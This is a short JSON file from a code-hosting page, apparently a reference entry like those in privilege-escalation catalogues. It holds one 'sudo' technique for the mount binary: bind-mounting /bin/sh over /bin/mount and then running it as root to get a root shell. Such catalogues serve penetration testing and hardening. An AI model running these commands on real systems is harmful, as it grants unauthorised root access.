You cannot select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

10 lines
257 B
JSON

{
"functions": {
"sudo": [
{
"description": "Exploit the fact that 'mount' can be executed via 'sudo' to replace the 'mount' binary with a shell.",
"code": "sudo mount -o bind /bin/sh /bin/mount\nsudo mount\n"
}
]
}
}